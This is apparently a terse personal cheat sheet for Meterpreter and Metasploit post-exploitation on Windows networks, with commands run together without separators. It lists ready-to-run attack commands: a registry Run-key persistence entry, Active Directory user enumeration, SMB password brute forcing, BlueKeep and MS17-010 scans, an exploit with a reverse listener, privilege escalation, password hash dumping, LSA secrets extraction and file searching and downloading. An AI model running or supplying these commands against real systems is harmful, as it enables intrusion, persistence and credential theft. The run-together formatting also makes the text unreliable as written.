Meterpreter
Add modules from exploit-db
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdFind" /t REG_SZ /F /D "C:\Users\Public\aaaa.exe"
runas /user:Administrator "C:\Users\Public\aaaa.exe -f (objectcategory=person)" > C:\Users\Public\ad_users.txt”msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set user_as_pass true; set user_file /void/Wordlists/Probable-Wordlists/Real-Passwords/Top1575-probable-v2.txt; set rhost 192.168.2.11; set smbdomain vmoshpit; run; exit -y"msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.11; run; exit -y"msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.11; run; exit -y"msfconsole -q -x "use exploit/windows/http/easyfilesharing_seh; set rhosts 172.16.245.12; set lhost 172.16.245.19; set lport 80; run"msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.212; run; exit -y" && msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.212; run; exit -y"run post/windows/escalate/getsystemrun post/windows/gather/hashdumprun post/windows/gather/lsa_secretsFilesystem | meterpreter > lpwd (Print local wd) meterpreter > lls (List local files) meterpreter > edit (Edit a file) meterpreter > download (Download a file) meterpreter > search -f *.docx
|
Last updated